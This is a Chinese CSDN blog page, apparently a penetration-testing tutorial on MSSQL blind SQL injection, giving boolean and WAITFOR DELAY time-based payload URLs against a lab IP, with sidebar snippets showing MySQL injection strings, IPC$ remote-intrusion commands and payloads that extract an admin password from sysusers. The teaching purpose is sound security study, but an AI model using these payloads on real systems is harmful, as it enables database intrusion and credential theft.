渗透测试之MSSQL盲注(布尔盲注+时间盲注+报错注入)

最新推荐文章于 2022-09-16 16:53:10 发布
最新推荐文章于 2022-09-16 16:53:10 发布
阅读量2.6k 收藏 5
点赞数 2
分类专栏: 渗透测试基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37077262/article/details/102974778
版权
本文介绍了MSSQL数据库的渗透测试方法,包括布尔盲注、时间盲注和报错注入。布尔盲注通过判断查询结果是否存在来获取信息;时间盲注利用查询响应时间差异进行注入;报错注入则利用数据库的错误信息揭示敏感数据。示例中展示了隐式转换和显式转换(如CAST和CONVERT函数)在报错注入中的应用。
摘要由CSDN通过智能技术生成

1.   布尔盲注

http://192.168.20.155/test.aspx?id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)) >= 109

 

2.   时间盲注 

http://192.168.20.155/test.aspx?id=1;if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

  

http://192.168.20.155/test.aspx?id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 WAITFOR DELAY '0:0:5'--

 

最低0.47元/天 解锁文章
LKmnbZ
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB漏洞-SQL注入之查询方式及
weixin_46425310的博客
06-12 224
WEB漏洞-SQL注入之查询方式及 当进行SQL注入时,常常会遇到无回显的情况,不回显可能是因为SQL语句的查询方式的问题,这时候需要用到进行后续操作,在手工注入时,最好提前预知SQL语句的写法。 查询方式:增删查改 INSERT SELECT DELETE UPDATE 分为以下三类: 布尔-逻辑判断 ?id=1’+and+left((select+database()),2)=‘se’–+ 时间-延时判断 if,sleep mid(a,b,c) 从位置b开始,截取a字符串的
SQL注入-时间
最新发布
WolvenSec的博客
06-03 1748
SQL时间(Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间的具体思路:进入关卡首先构建参数id。
SQL注入漏洞(union +
m0_61506558的博客
09-16 1606
数据库漏洞一直处于OWASP前几名,虽然在2021年滑到第三,漏洞的危害是不言而喻的,数据库可以分为两种:关系型数据库:关系型数据库,存储的格式可以直观地反映实体间的关系。关系型数据库和常见的表格比较相似, 关系型数据库中表与表之间是有很多复杂的关联关系的。常见的关系型数据库有 MySQL,Oracle, PostgreSQL,SQL Server等。
sql注入进阶-注入、order by注入、二次注入、SQL注入绕过速查表
Love&Share
09-09 1169
SQL注入 手法分类: 联合注入注入布尔、延时注入、多语句查询注入(堆叠注入) 可能存在注入的点: GPC GET POST COOKIE HTTP头(请求文及其他字段) 基础 mysql、mssql、SQL Server 以及 Oracle等,不同数据库有不同的特性 mysql 释 #、-- (空格)、–+、/* */、/*! */(内联查询) mysql默认表 元数据数据库:information_schema(mysql5后才有) mysql表:保存了用户密码,h
渗透测试-干货 | 80篇+网络安全面试经验帖(面试篇)
lza20001103的博客
07-27 2713
渗透测试-干货 | 80篇+网络安全面试经验帖(面试篇)
(16)【SQL】基础函数、回显、延时判断、逻辑判断
02-25 1995
适合新手看的
渗透测试——sql手工注入实战 @apache+php+Mysql 正则注入
aming小老弟
07-05 58
0x01 Mysql 手工注入 1.1 联合注入 登录后复制 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from informat...
oracle手工注入,注入
weixin_34515601的博客
04-10 440
Spring的常用解2021-01-21 13:03:49① @Component:使用在普通java类上② @Service:使用在业务层类上作用:声明一个类的对象为bean对象,相当于配置了bean标签。意:相当于使用的是无参数构造器来创建对象。问题:只使用@Service解,和 A a=new A();的效果是相同的,创建的是一个没有初始化数据的bean对象,但是在sqlmap2021...
渗透之路 -- sql注入
r0cky的博客
08-04 747
文章目录SQL注入mysql注入(上)`limit` 有两个参数 `limit 2,3` 表示从2开始查3条通过MySql内置数据库获取表名通过MySql内置数据库获取表名对应的列名mysql注入(中)SQL常用函数常用十大函数1.floor()2.extractvalue()3.updatexml()4.geometrycollection()5.multipoint()6.polygon...
渗透测试面试题总结
热门推荐
0x536d72的博客
11-25 4万+
渗透测试常见面试题
mssql.txt
07-18
MSSQL(Blind SQL Injection)是指攻击者利用应用程序中的输入验证漏洞,向数据库发送SQL查询指令,但由于应用程序没有返回具体的误信息或查询结果,攻击者只能通过观察程序的行为变化(如响应时间、HTTP状态...
MSSQL2005 手工 总结.txt
07-18
在安全测试渗透测试过程中,了解并掌握如何进行SQL注入攻击对于评估系统的安全性至关重要。“手工”是指在没有直接反馈的情况下,通过构造特殊的数据包来获取目标数据库的信息。本文将基于给定文件中的信息,...
【技术分享】MSSQL 注入攻击与防御.pdf
09-27
数据库涉及SQL Server 2k5,2k8,2k12,其次对于绕过姿势和前文并无太大差别,就不做过多的讲解,主要放在后面的提权上 **系统库** [![http://p2.qhimg.com/t01287a065f9c9a0374.png]...
Delphi读取ini,测试连接MSSQL+源码
04-28
本文将深入探讨如何使用Delphi读取ini文件,并介绍如何进行MSSQL数据库的连接测试,同时提供相应的源码示例,这对于初学者来说是非常有价值的。 一、Delphi读取ini文件 Delphi提供了TIniFile组件,使得读取和写入...
SQL注入MSSQL注入MSSQL⼿⼯
12-29
sql注入,SQL注入MSSQL注入MSSQL⼿⼯测试使⽤Windows Server 2008 R2 中使⽤IIS搭建的MSSQL-SQLi-Labs站点的第⼀关(该站点可在Github中找到
渗透测试之pikachu 越权(水平越权+垂直越权)
LKmnbZ's Blog
11-12 8054
1. over permission越权概述 如果使用A用户的权限去操作B用户的数据,A的权限小于B的权限,如果能够成功操作,则称之为越权操作。 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。 一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 对当前用户的权限进行校验,看其是否具备操作的权限,从而给出响...
Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)
LKmnbZ's Blog
01-14 6788
一、经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令来得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32...
渗透测试之提权 (udf提权+mof提权+启动项提权)
LKmnbZ's Blog
11-07 5643
1. 提权 低权限给高权限去提取(你已经获得一定的权限) Windows 一般用户 系统用户 管理员 system Linux 普通用户 系统用户 root 2. udf提权 1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete 权限以创建和抛弃函...
mssql时间payloads
06-02
以下是一些可能的 MSSQL 时间 payload: 1. 判断是否存在某个用户: ```sql '; IF EXISTS(SELECT * FROM sysusers WHERE name='admin' AND SUBSTRING(password,1,1)='a') WAITFOR DELAY '0:0:10-- ``` 2. 判断密码的第一位是否为 'a': ```sql '; IF SUBSTRING((SELECT password FROM sysusers WHERE name='admin'),1,1)='a' WAITFOR DELAY '0:0:10-- ``` 3. 判断密码的第二位是否为 'b': ```sql '; IF SUBSTRING((SELECT password FROM sysusers WHERE name='admin'),2,1)='b' WAITFOR DELAY '0:0:10-- ``` 4. 判断密码的第三位是否为 'c': ```sql '; IF SUBSTRING((SELECT password FROM sysusers WHERE name='admin'),3,1)='c' WAITFOR DELAY '0:0:10-- ``` 请意,这些 payload 可能需要根据数据库结构进行适当修改。同时,这些 payload 可能需要进行多次尝试才能成功,因为时间攻击通常需要等待一段时间才能得到响应。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值